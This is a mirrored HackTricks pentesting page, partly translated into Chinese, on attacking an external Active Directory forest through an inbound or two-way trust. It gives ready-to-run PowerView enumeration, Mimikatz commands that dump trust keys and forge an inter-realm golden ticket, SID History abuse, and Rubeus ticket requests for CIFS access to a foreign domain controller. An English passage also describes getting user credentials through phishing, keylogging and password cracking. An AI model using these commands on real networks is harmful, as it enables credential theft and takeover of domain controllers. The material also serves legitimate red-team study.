Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
Translator workflow a21a0e7217 Translated to Chinese
2023-08-03 19:12:22 +00:00

9.4 KiB
Raw Blame History

外部森林域 - 单向(入站)或双向

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

在这种情况下,一个外部域信任你(或者两者互相信任),因此你可以获得对它的某种访问权限。

枚举

首先,你需要枚举这个信任关系

Get-DomainTrust
SourceName      : a.domain.local   --> Current domain
TargetName      : domain.external  --> Destination domain
TrustType       : WINDOWS-ACTIVE_DIRECTORY
TrustAttributes :
TrustDirection  : Inbound          --> Inboud trust
WhenCreated     : 2/19/2021 10:50:56 PM
WhenChanged     : 2/19/2021 10:50:56 PM

# Get name of DC of the other domain
Get-DomainComputer -Domain domain.external -Properties DNSHostName
dnshostname
-----------
dc.domain.external

# Groups that contain users outside of its domain and return its members
Get-DomainForeignGroupMember -Domain domain.external
GroupDomain             : domain.external
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=domain,DC=external
MemberDomain            : domain.external
MemberName              : S-1-5-21-3263068140-2042698922-2891547269-1133
MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,
DC=external

# Get name of the principal in the current domain member of the cross-domain group
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
DEV\External Admins

# Get members of the cros-domain group
Get-DomainGroupMember -Identity "External Admins" | select MemberName
MemberName
----------
crossuser

# Lets list groups members
## Check how the "External Admins" is part of the Administrators group in that DC
Get-NetLocalGroupMember -ComputerName dc.domain.external
ComputerName : dc.domain.external
GroupName    : Administrators
MemberName   : SUB\External Admins
SID          : S-1-5-21-3263068140-2042698922-2891547269-1133
IsGroup      : True
IsDomain     : True

# You may also enumerate where foreign groups and/or users have been assigned
# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.

在之前的枚举中发现,用户**crossuser位于External Admins组中,该组在外部域的DC中具有管理员访问权限**。

初始访问

如果您在其他域中找不到您的用户的任何特殊访问权限您仍然可以返回AD方法论并尝试从非特权用户进行特权升级例如使用kerberoasting

您可以使用Powerview函数使用-Domain参数来枚举其他域,如下所示:

Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName

冒充

登录

使用具有访问外部域的用户凭据的常规方法,您应该能够访问:

Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator

SID History滥用

您还可以在跨域信任中滥用SID History

如果用户从一个域迁移到另一个域,并且未启用SID过滤,则可以将来自另一个域的SID添加到用户在跨域认证时的令牌中。

{% hint style="warning" %} 提醒一下,您可以使用以下命令获取签名密钥

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local

{% endhint %}

您可以使用受信任的密钥签名一个模拟当前域用户的TGT

# Get a TGT for the cross-domain privileged user to the other domain
Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'

# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap

# Now you have a TGS to access the CIFS service of the domain controller

完整的冒充用户方法

In this technique, we will impersonate a user in order to gain unauthorized access to their account. This can be done by obtaining the user's credentials through various means such as phishing, keylogging, or password cracking. Once we have the user's credentials, we can use them to log in to their account and perform actions on their behalf.

To impersonate a user, we need to follow these steps:

  1. Obtain the user's credentials: This can be done through phishing attacks, where we trick the user into revealing their username and password. Another method is keylogging, where we capture the user's keystrokes to obtain their login information. Password cracking can also be used to guess or crack the user's password.

  2. Log in as the user: Once we have the user's credentials, we can log in to their account using their username and password. This can be done through the login page of the target application or system.

  3. Perform actions on behalf of the user: After successfully logging in as the user, we can perform various actions on their behalf. This can include accessing sensitive information, modifying settings, sending emails, or performing any other actions that the user is authorized to do.

It is important to note that impersonating a user without their consent is illegal and unethical. This technique should only be used for legitimate purposes, such as penetration testing or authorized security assessments.

# Get a TGT of the user with cross-domain permissions
Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap

# Get a TGT from the current domain for the target domain for the user
Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap

# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap

# Now you have a TGS to access the CIFS service of the domain controller
☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥